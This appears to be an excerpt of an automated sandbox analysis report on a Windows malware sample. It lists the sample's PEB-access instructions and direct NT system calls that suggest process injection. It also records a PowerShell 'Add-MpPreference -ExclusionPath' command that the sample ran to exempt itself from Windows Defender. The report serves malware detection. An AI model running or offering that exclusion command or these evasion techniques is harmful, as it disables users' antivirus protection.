                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E6F2 mov eax, dword ptr fs:[00000030h]4_2_0178E6F2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E6F2 mov eax, dword ptr fs:[00000030h]4_2_0178E6F2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E6F2 mov eax, dword ptr fs:[00000030h]4_2_0178E6F2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0174A6C7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174A6C7 mov eax, dword ptr fs:[00000030h]4_2_0174A6C7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017466B0 mov eax, dword ptr fs:[00000030h]4_2_017466B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174C6A6 mov eax, dword ptr fs:[00000030h]4_2_0174C6A6
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01714690 mov eax, dword ptr fs:[00000030h]4_2_01714690
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01714690 mov eax, dword ptr fs:[00000030h]4_2_01714690
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B4978 mov eax, dword ptr fs:[00000030h]4_2_017B4978
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B4978 mov eax, dword ptr fs:[00000030h]4_2_017B4978
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179C97C mov eax, dword ptr fs:[00000030h]4_2_0179C97C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01736962 mov eax, dword ptr fs:[00000030h]4_2_01736962
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01736962 mov eax, dword ptr fs:[00000030h]4_2_01736962
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01736962 mov eax, dword ptr fs:[00000030h]4_2_01736962
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0175096E mov eax, dword ptr fs:[00000030h]4_2_0175096E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0175096E mov edx, dword ptr fs:[00000030h]4_2_0175096E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0175096E mov eax, dword ptr fs:[00000030h]4_2_0175096E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01790946 mov eax, dword ptr fs:[00000030h]4_2_01790946
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A892B mov eax, dword ptr fs:[00000030h]4_2_017A892B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179892A mov eax, dword ptr fs:[00000030h]4_2_0179892A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01708918 mov eax, dword ptr fs:[00000030h]4_2_01708918
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01708918 mov eax, dword ptr fs:[00000030h]4_2_01708918
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179C912 mov eax, dword ptr fs:[00000030h]4_2_0179C912
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E908 mov eax, dword ptr fs:[00000030h]4_2_0178E908
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E908 mov eax, dword ptr fs:[00000030h]4_2_0178E908
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017429F9 mov eax, dword ptr fs:[00000030h]4_2_017429F9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017429F9 mov eax, dword ptr fs:[00000030h]4_2_017429F9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E9E0 mov eax, dword ptr fs:[00000030h]4_2_0179E9E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A9D0 mov eax, dword ptr fs:[00000030h]4_2_0171A9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A9D0 mov eax, dword ptr fs:[00000030h]4_2_0171A9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A9D0 mov eax, dword ptr fs:[00000030h]4_2_0171A9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A9D0 mov eax, dword ptr fs:[00000030h]4_2_0171A9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A9D0 mov eax, dword ptr fs:[00000030h]4_2_0171A9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A9D0 mov eax, dword ptr fs:[00000030h]4_2_0171A9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017449D0 mov eax, dword ptr fs:[00000030h]4_2_017449D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA9D3 mov eax, dword ptr fs:[00000030h]4_2_017DA9D3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A69C0 mov eax, dword ptr fs:[00000030h]4_2_017A69C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017989B3 mov esi, dword ptr fs:[00000030h]4_2_017989B3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017989B3 mov eax, dword ptr fs:[00000030h]4_2_017989B3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017989B3 mov eax, dword ptr fs:[00000030h]4_2_017989B3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017109AD mov eax, dword ptr fs:[00000030h]4_2_017109AD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017109AD mov eax, dword ptr fs:[00000030h]4_2_017109AD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6870 mov eax, dword ptr fs:[00000030h]4_2_017A6870
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6870 mov eax, dword ptr fs:[00000030h]4_2_017A6870
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E872 mov eax, dword ptr fs:[00000030h]4_2_0179E872
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E872 mov eax, dword ptr fs:[00000030h]4_2_0179E872
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01740854 mov eax, dword ptr fs:[00000030h]4_2_01740854
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01714859 mov eax, dword ptr fs:[00000030h]4_2_01714859
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01714859 mov eax, dword ptr fs:[00000030h]4_2_01714859
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01722840 mov ecx, dword ptr fs:[00000030h]4_2_01722840
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B483A mov eax, dword ptr fs:[00000030h]4_2_017B483A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B483A mov eax, dword ptr fs:[00000030h]4_2_017B483A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174A830 mov eax, dword ptr fs:[00000030h]4_2_0174A830
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01732835 mov eax, dword ptr fs:[00000030h]4_2_01732835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01732835 mov eax, dword ptr fs:[00000030h]4_2_01732835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01732835 mov eax, dword ptr fs:[00000030h]4_2_01732835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01732835 mov ecx, dword ptr fs:[00000030h]4_2_01732835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01732835 mov eax, dword ptr fs:[00000030h]4_2_01732835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01732835 mov eax, dword ptr fs:[00000030h]4_2_01732835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179C810 mov eax, dword ptr fs:[00000030h]4_2_0179C810
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174C8F9 mov eax, dword ptr fs:[00000030h]4_2_0174C8F9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174C8F9 mov eax, dword ptr fs:[00000030h]4_2_0174C8F9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA8E4 mov eax, dword ptr fs:[00000030h]4_2_017DA8E4
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173E8C0 mov eax, dword ptr fs:[00000030h]4_2_0173E8C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179C89D mov eax, dword ptr fs:[00000030h]4_2_0179C89D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710887 mov eax, dword ptr fs:[00000030h]4_2_01710887
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170CB7E mov eax, dword ptr fs:[00000030h]4_2_0170CB7E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B8B42 mov eax, dword ptr fs:[00000030h]4_2_017B8B42
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6B40 mov eax, dword ptr fs:[00000030h]4_2_017A6B40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6B40 mov eax, dword ptr fs:[00000030h]4_2_017A6B40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DAB40 mov eax, dword ptr fs:[00000030h]4_2_017DAB40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173EB20 mov eax, dword ptr fs:[00000030h]4_2_0173EB20
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173EB20 mov eax, dword ptr fs:[00000030h]4_2_0173EB20
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D8B28 mov eax, dword ptr fs:[00000030h]4_2_017D8B28
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D8B28 mov eax, dword ptr fs:[00000030h]4_2_017D8B28
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718BF0 mov eax, dword ptr fs:[00000030h]4_2_01718BF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718BF0 mov eax, dword ptr fs:[00000030h]4_2_01718BF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718BF0 mov eax, dword ptr fs:[00000030h]4_2_01718BF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179CBF0 mov eax, dword ptr fs:[00000030h]4_2_0179CBF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173EBFC mov eax, dword ptr fs:[00000030h]4_2_0173EBFC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BEBD0 mov eax, dword ptr fs:[00000030h]4_2_017BEBD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01730BCB mov eax, dword ptr fs:[00000030h]4_2_01730BCB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01730BCB mov eax, dword ptr fs:[00000030h]4_2_01730BCB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01730BCB mov eax, dword ptr fs:[00000030h]4_2_01730BCB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710BCD mov eax, dword ptr fs:[00000030h]4_2_01710BCD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710BCD mov eax, dword ptr fs:[00000030h]4_2_01710BCD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710BCD mov eax, dword ptr fs:[00000030h]4_2_01710BCD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720BBE mov eax, dword ptr fs:[00000030h]4_2_01720BBE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720BBE mov eax, dword ptr fs:[00000030h]4_2_01720BBE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178CA72 mov eax, dword ptr fs:[00000030h]4_2_0178CA72
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178CA72 mov eax, dword ptr fs:[00000030h]4_2_0178CA72
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174CA6F mov eax, dword ptr fs:[00000030h]4_2_0174CA6F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174CA6F mov eax, dword ptr fs:[00000030h]4_2_0174CA6F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174CA6F mov eax, dword ptr fs:[00000030h]4_2_0174CA6F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716A50 mov eax, dword ptr fs:[00000030h]4_2_01716A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716A50 mov eax, dword ptr fs:[00000030h]4_2_01716A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716A50 mov eax, dword ptr fs:[00000030h]4_2_01716A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716A50 mov eax, dword ptr fs:[00000030h]4_2_01716A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716A50 mov eax, dword ptr fs:[00000030h]4_2_01716A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716A50 mov eax, dword ptr fs:[00000030h]4_2_01716A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716A50 mov eax, dword ptr fs:[00000030h]4_2_01716A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720A5B mov eax, dword ptr fs:[00000030h]4_2_01720A5B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720A5B mov eax, dword ptr fs:[00000030h]4_2_01720A5B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01734A35 mov eax, dword ptr fs:[00000030h]4_2_01734A35
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01734A35 mov eax, dword ptr fs:[00000030h]4_2_01734A35
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174CA38 mov eax, dword ptr fs:[00000030h]4_2_0174CA38
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174CA24 mov eax, dword ptr fs:[00000030h]4_2_0174CA24
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173EA2E mov eax, dword ptr fs:[00000030h]4_2_0173EA2E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179CA11 mov eax, dword ptr fs:[00000030h]4_2_0179CA11
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174AAEE mov eax, dword ptr fs:[00000030h]4_2_0174AAEE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174AAEE mov eax, dword ptr fs:[00000030h]4_2_0174AAEE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710AD0 mov eax, dword ptr fs:[00000030h]4_2_01710AD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01744AD0 mov eax, dword ptr fs:[00000030h]4_2_01744AD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01744AD0 mov eax, dword ptr fs:[00000030h]4_2_01744AD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01766ACC mov eax, dword ptr fs:[00000030h]4_2_01766ACC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01766ACC mov eax, dword ptr fs:[00000030h]4_2_01766ACC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01766ACC mov eax, dword ptr fs:[00000030h]4_2_01766ACC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718AA0 mov eax, dword ptr fs:[00000030h]4_2_01718AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718AA0 mov eax, dword ptr fs:[00000030h]4_2_01718AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01766AA4 mov eax, dword ptr fs:[00000030h]4_2_01766AA4
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01748A90 mov edx, dword ptr fs:[00000030h]4_2_01748A90
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E4A80 mov eax, dword ptr fs:[00000030h]4_2_017E4A80
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_017A8D6B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_01710D59 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_01710D59 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_01710D59 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_01718D59 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_01718D59 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_01718D59 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_01718D59 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_01718D59 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_01798D20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_01706D10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_01706D10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_01706D10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_01744D1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_017C8D10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_017C8D10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_0172AD00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_0172AD00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_0172AD00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_0173CDF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_0173CDF0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_01706DF6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_017B0DF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_017B0DF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe; Code function: 4_2_0171ADE0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                Source: C:\Users\user\Desktop\file.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion
                Source: C:\Users\user\Desktop\file.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtQueryVolumeInformationFile: Direct from: 0x76F12F2C
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtQuerySystemInformation: Direct from: 0x76F148CC
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtAllocateVirtualMemory: Direct from: 0x76F148EC
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtQueryAttributesFile: Direct from: 0x76F12E6C
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtReadVirtualMemory: Direct from: 0x76F12E8C
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtCreateKey: Direct from: 0x76F12C6C
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtSetInformationThread: Direct from: 0x76F12B4C
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtClose: Direct from: 0x76F12B6C
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtAllocateVirtualMemory: Direct from: 0x76F13C9C
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtWriteVirtualMemory: Direct from: 0x76F1490C
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtCreateUserProcess: Direct from: 0x76F1371C
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtTerminateThread: Direct from: 0x76F12FCC
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtCreateFile: Direct from: 0x76F12FEC
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtOpenFile: Direct from: 0x76F12DCC
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtQueryInformationToken: Direct from: 0x76F12CAC
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtAllocateVirtualMemory: Direct from: 0x76F12BEC
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtDeviceIoControlFile: Direct from: 0x76F12AEC
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtSetInformationThread: Direct from: 0x76F063F9
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtOpenSection: Direct from: 0x76F12E0C
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtMapViewOfSection: Direct from: 0x76F12D1C
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtResumeThread: Direct from: 0x76F136AC
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtCreateMutant: Direct from: 0x76F135CC
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtWriteVirtualMemory: Direct from: 0x76F12E3C
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtNotifyChangeKey: Direct from: 0x76F13C2C
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtProtectVirtualMemory: Direct from: 0x76F07B2E
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtProtectVirtualMemory: Direct from: 0x76F12F9C
